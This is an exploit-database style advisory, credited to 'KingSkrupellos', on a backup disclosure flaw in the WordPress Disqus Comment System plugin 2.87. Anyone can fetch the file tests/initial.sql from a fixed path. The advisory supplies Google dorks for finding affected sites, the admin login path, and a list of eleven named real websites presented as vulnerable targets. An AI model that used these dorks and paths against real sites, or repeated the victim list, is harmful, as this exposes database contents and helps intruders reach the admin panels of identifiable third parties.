WordPress Disqus Comment System 2.87 Database Disclosure

1. #################################################################################################
2.  
3. # Exploit Title : WordPress Disqus Comment System Plugins 2.87 Database Backup Disclosure
4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
5. # Date : 08/12/2018
6. # Vendor Homepage : disqus.com ~ wordpress.org/plugins/disqus-comment-system/
7. # Software Download Link : github.com/clearhead/clearhead.me/archive/master.zip
8. + github.com/clearhead/clearhead.me/blob/master/wp-content/plugins/disqus-comment-system/tests/initial.sql
9. # Tested On : Windows and Linux
10. # Category : WebApps
11. # Version Information : 2.87 and 3.0
12. # Exploit Risk : Medium
13. # Google Dorks : inurl:''/wp-content/plugins/disqus-comment-system/tests/''
14. intext:''Greyzed Theme created by The Forge Web Creations. Powered by WordPress.''
15. intext:''© 2008 - 2018 Grazitti Interactive. All rights reserved''
16. intext:''HyTrade Marketing & Comunicação © 2017 | Todos direitos reservados''
17. intext:''© 2018 Chainbit, LLC. All rights reserved''
18. intext:''Copyright 2015 / CIP Data Collection Ltd Company No. 10462735''
19. intext:''© 2017 Longlife Magazine - All Rights Reserved.''
20. intext:''© Copyright Feira Cultural 2017. Todos os direitos reservado''
21. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
22. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
23. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
24.  
25. #################################################################################################
26.  
27. -- MySQL dump 10.13 Distrib 5.1.48, for apple-darwin10.4.0 (i386)
28. --
29. -- Host: localhost Database: wordpress
30. -- ------------------------------------------------------
31. -- Server version 5.1.48
32.  
33. #################################################################################################
34.  
35. # Admin Panel Login Path :
36.  
37. /wp-login.php
38.  
39. # Exploit :
40.  
41. /wp-content/plugins/disqus-comment-system/tests/initial.sql
42.  
43. #################################################################################################
44.  
45. # Example Vulnerable Sites =>
46.  
47. [+] therussianlinesman.com/blog/wp-content/plugins/disqus-comment-system/tests/initial.sql
48.  
49. [+] hytrade.com.br/wp-content/plugins/disqus-comment-system/tests/initial.sql
50.  
51. [+] grazitti.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
52.  
53. [+] paulsforza.com/wordpress/wp-content/plugins/disqus-comment-system/tests/initial.sql
54.  
55. [+] combbo.com.br/cmb/wp-content/plugins/disqus-comment-system/tests/initial.sql
56.  
57. [+] uof7.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
58.  
59. [+] ecommerceandb2b.com/b2bblog/wp-content/plugins/disqus-comment-system/tests/initial.sql
60.  
61. [+] cipmetering.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
62.  
63. [+] soogran.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
64.  
65. [+] longlifemagz.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
66.  
67. [+] feiracultural.art.br/wp-content/plugins/disqus-comment-system/tests/initial.sql
68.  
69. #################################################################################################
70.  
71. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
72.  
73. #################################################################################################